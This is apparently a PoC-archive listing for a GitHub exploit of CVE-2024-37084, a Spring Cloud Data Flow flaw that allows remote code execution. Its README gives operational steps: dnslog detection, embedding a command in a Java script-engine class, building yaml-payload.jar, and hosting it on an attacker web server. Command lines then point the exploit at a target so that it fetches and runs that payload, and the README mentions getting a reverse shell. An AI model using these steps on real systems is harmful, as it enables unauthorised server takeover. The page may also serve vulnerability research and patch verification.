Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-37084 PoC — CVE-2024-37084: Remote code execution in Spring Cloud Data Flow

Source
https://github.com/Ly4j/CVE-2024-37084-Exp
Associated Vulnerability
Title:CVE-2024-37084: Remote code execution in Spring Cloud Data Flow (CVE-2024-37084)
Description:In Spring Cloud Data Flow versions prior to 2.11.4,  a malicious user who has access to the Skipper server api can use a crafted upload request to write an arbitrary file to any location on the file system which could lead to compromising the server
Description
Spring Cloud Data Flow CVE-2024-37084 exp
Readme
1. Use dnslog to detect whether CVE-2024-37084 vulnerability exists, Then manually check dnslog
   
`python cve-2024-37084-exp.py -u http://192.168.67.135:7577 -dnslog xxx.dnslog.cn`

2. then you can Execute system commands
   
**first:** Enter the command you want to execute in src\artsploit\AwesomeScriptEngineFactory.java

![image](https://github.com/user-attachments/assets/bca82f8a-1b22-4cf8-adb9-96e5650153d2)

**after that:** Double-click the. py file to generate the yaml-payload.jar file.

![image](https://github.com/user-attachments/assets/c6964441-dc24-44a0-8ae4-c5bc3888e70d)

**after that:** Put yaml-payload.jar on the linux server and start a web service with python. Note: Every time you execute a different command, you need to rename yaml-payload.jar, that is, xx.jar that you access, with a different name every time. Otherwise the new command will not take effect.

The access path is as follows: http://192.168.67.133/yaml-payload.jar.

**finally:** Execute poc

`cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar`

![image](https://github.com/user-attachments/assets/13536acf-afb8-4e7d-adf8-629aab9b3157)

Enter the corresponding container to view and successfully execute the command.

![image](https://github.com/user-attachments/assets/910021ef-ec3d-4536-b4af-e0c8f86f2d2c)

**Rebound shell:**
![image](https://github.com/user-attachments/assets/24a0bfc1-62f3-4489-bd81-461c6a2955ea)
![image](https://github.com/user-attachments/assets/b6f7cecf-20cd-406e-9fc2-e1284719d7ac)
File Snapshot

 [4.0K]  /data/pocs/c97e6c4114821dd15d588c422f6bb6cf151ebda7
├── [4.8K]  cve-2024-37084-exp.py
├── [1.5K]  README.md
└── [4.0K]  yaml-payload-master
    ├── [ 144]  generate-yaml-payload.jar.py
    ├── [4.0K]  src
    │   ├── [4.0K]  artsploit
    │   │   ├── [1.7K]  AwesomeScriptEngineFactory.class
    │   │   └── [1.7K]  AwesomeScriptEngineFactory.java
    │   └── [4.0K]  META-INF
    │       └── [4.0K]  services
    │           └── [  36]  javax.script.ScriptEngineFactory
    └── [2.4K]  yaml-payload.jar

5 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →